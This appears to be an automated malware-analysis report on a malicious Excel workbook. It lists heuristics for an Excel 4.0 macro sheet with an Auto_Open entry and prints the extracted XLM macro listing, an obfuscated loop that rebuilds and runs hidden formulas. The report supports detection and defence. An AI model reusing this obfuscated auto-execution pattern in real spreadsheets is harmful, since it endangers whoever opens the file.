MALICIOUS
140
Risk Score
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6678 bytes |
SHA-256: ed5e3da5560225b644e6ce9b95180fee3676e4aa078efbc8e502ab1d030eeb43 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 19 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - hRZfNmxpCq
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!F135
' 0018 21 LABEL : Cell Value, String Constant - BzLgtl len=0
' 0018 20 LABEL : Cell Value, String Constant - CikWI len=0
' 0018 21 LABEL : Cell Value, String Constant - cSAZfm len=0
' 0018 21 LABEL : Cell Value, String Constant - DfLMrr len=0
' 0018 20 LABEL : Cell Value, String Constant - EUtac len=0
' 0018 26 LABEL : Cell Value, String Constant - FGajavxjvhj len=0
' 0018 23 LABEL : Cell Value, String Constant - FQuxzyhx len=0
' 0018 26 LABEL : Cell Value, String Constant - hrTnrEbWdCn len=0
' 0018 21 LABEL : Cell Value, String Constant - Imwfdf len=0
' 0018 26 LABEL : Cell Value, String Constant - LBhvitXSpgf len=0
' 0018 20 LABEL : Cell Value, String Constant - nhhGX len=0
' 0018 22 LABEL : Cell Value, String Constant - nLUEBxT len=0
' 0018 21 LABEL : Cell Value, String Constant - QoSFQs len=0
' 0018 25 LABEL : Cell Value, String Constant - RgcZOqGSiE len=0
' 0018 27 LABEL : Cell Value, String Constant - UBtgGHZawUlw len=0
' 0018 26 LABEL : Cell Value, String Constant - WAAzcLhAQuG len=0
' 0018 27 LABEL : Cell Value, String Constant - yCumVhcbyPtn len=0
' 0018 24 LABEL : Cell Value, String Constant - yVnwnXIxU len=0
' 0018 21 LABEL : Cell Value, String Constant - yYdUtP len=0
' 0018 21 LABEL : Cell Value, String Constant - zgCubu len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' hRZfNmxpCq,F41,"SET.NAME("DfLMrr",VALUE("0"))",""
' hRZfNmxpCq,F45,"SET.NAME("hrTnrEbWdCn",DfLMrr)",""
' hRZfNmxpCq,F49,"SET.NAME("Imwfdf",DfLMrr)",""
' hRZfNmxpCq,F54,"SET.NAME("yCumVhcbyPtn",COUNTA(CikWI))",""
' hRZfNmxpCq,F57,"SET.NAME("EUtac",COUNTA(QoSFQs))",""
' hRZfNmxpCq,F61,[],""
' hRZfNmxpCq,F63,"SET.NAME("LBhvitXSpgf","")",""
' hRZfNmxpCq,F66,"hrTnrEbWdCn",""
' hRZfNmxpCq,F71,"SET.NAME("yVnwnXIxU",HLOOKUP("*",CikWI,hrTnrEbWdCn,FALSE))",""
' hRZfNmxpCq,F75,"RgcZOqGSiE",""
' hRZfNmxpCq,F77,"SET.NAME("zgCubu",DfLMrr)",""
' hRZfNmxpCq,F81,[],""
' hRZfNmxpCq,F85,"zgCubu",""
' hRZfNmxpCq,F89,"BzLgtl",""
' hRZfNmxpCq,F93,"FQuxzyhx",""
' hRZfNmxpCq,F98,"nLUEBxT",""
' hRZfNmxpCq,F102,"SET.NAME("UBtgGHZawUlw",VALUE(HLOOKUP("*",QoSFQs,nLUEBxT,FALSE)))",""
' hRZfNmxpCq,F105,"WAAzcLhAQuG",""
' hRZfNmxpCq,F109,"LBhvitXSpgf",""
' hRZfNmxpCq,F114,"Imwfdf",""
' hRZfNmxpCq,F118,NEXT(),""
' hRZfNmxpCq,F121,"nhhGX",""
' hRZfNmxpCq,F123,"SET.NAME("f",INT(T(FORMULA(T(LBhvitXSpgf)&"",""&T(nhhGX)))))",""
' hRZfNmxpCq,F128,"FGajavxjvhj",""
' hRZfNmxpCq,F130,NEXT(),""
' hRZfNmxpCq,F133,RETURN(),""
' hRZfNmxpCq,F163,"SET.NAME("yYdUtP",F41)",""
' hRZfNmxpCq,F167,"CikWI",""
' hRZfNmxpCq,F171,"SET.NAME("QoSFQs",R67C13)",""
' hRZfNmxpCq,F175,"SET.NAME("FGajavxjvhj",183)",""
' hRZfNmxpCq,F177,"SET.NAME("cSAZfm",6)",""
' hRZfNmxpCq,F182,yYdUtP(),""
' hRZfNmxpCq,F183,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.